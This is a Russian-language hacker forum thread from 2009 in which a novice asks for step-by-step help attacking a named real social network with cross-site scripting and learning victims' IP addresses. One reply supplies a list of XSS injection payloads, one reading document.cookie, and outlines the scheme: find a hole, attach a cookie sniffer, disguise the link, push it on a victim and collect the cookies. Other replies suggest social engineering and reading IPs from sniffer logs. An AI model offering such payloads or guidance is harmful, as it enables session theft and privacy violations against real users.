 |
11.12.2009, 11:27
|
|
Новичок
Регистрация: 21.11.2009
Сообщений: 11
С нами:
8669111
Репутация:
1
|
|
XSS помогите
Люди помогите! Прочитал вот это и толком ничего не понял можно как то совсем подробно разжевать? Куда заходить, что нажимать и куда что пихать.... Я совсем ламер если что.
Меня интересует что бы это работало на www.one.lv Или помогите на практике. Могу дать аккаунт для опытов, если кто решит помоч.
P.S. В гугл просьба непосылать, там кроме этой статьи ничего нет.
P.S.S. Еще вопрос. Можно ли этим методом узнать ip жертвы и как можно больше инфы? |
|
|
11.12.2009, 12:10
|
|
Познающий
Регистрация: 15.09.2008
Сообщений: 54
С нами:
9290631
Репутация:
46
|
|
если ты там ничего непонял никто тебе необъяснит там и так все подробно расписано
|
|
|
|
11.12.2009, 12:19
|
|
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
С нами:
9351139
Репутация:
1593
|
|
Логинься и подставляй во все поля всевозможные комбинации:
Код:
<img src="javascript:alert('XSS')"</img>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
"><script>alert(document.cookie)</script>
Найдешь, прицепишь сниффер, зашифруешь ссылку здесь, впаришь жертве, проверишь лог сниффера - куки твои.
Последний раз редактировалось root_sashok; 11.12.2009 в 12:23..
|
|
|
|
11.12.2009, 17:44
|
|
Участник форума
Регистрация: 21.03.2009
Сообщений: 207
С нами:
9021828
Репутация:
119
|
|
Насчет IP жертвы и инфы, СИ тебе в помощь
http://www.social.do.am/
http://bugtraq.ru/library/misc/social.html
|
|
|
|
11.12.2009, 19:52
|
|
Участник форума
Регистрация: 23.10.2009
Сообщений: 103
С нами:
8710432
Репутация:
7
|
|
Люди помогите! Прочитал вот это и толком ничего не понял можно как то совсем подробно разжевать? Куда заходить, что нажимать и куда что пихать.... Я совсем ламер если что.
Если чесно, я когда изучал xss тоже ничего по этой статье непонял, до меня долго доходило, надо сам смысл почувствовать. А вот про то что в гугле только одна страница - убило.
P.S.S. Еще вопрос. Можно ли этим методом узнать ip жертвы и как можно больше инфы?
Насчет IP жертвы и инфы, СИ тебе в помощь
В логах сниффера будет айпи, в поле реферер или аналогичном ему.
|
|
|
|
12.12.2009, 12:08
|
|
Новичок
Регистрация: 21.11.2009
Сообщений: 11
С нами:
8669111
Репутация:
1
|
|
Сообщение от root_sashok
Логинься и подставляй во все поля всевозможные комбинации:
Код:
<img src="javascript:alert('XSS')"</img>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
"><script>alert(document.cookie)</script>
Найдешь, прицепишь сниффер, зашифруешь ссылку здесь, впаришь жертве, проверишь лог сниффера - куки твои. Ну вроде разобрался....Появилась другая проблема... Опыты ставил на форуме.Когда я из этого списка вставляю по одной строке, то мне ее и пишет. А когда я пытался засунуть весь список, то он почти на всех строках выдавал значок (картинка) и писал что "много кодировки,нельзя загрузить" Вот с этим как быть?
P.S. Форма отправки сообщений юзеру и сообщений на форум одинакова.
Последний раз редактировалось sakrej1; 12.12.2009 в 12:51..
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
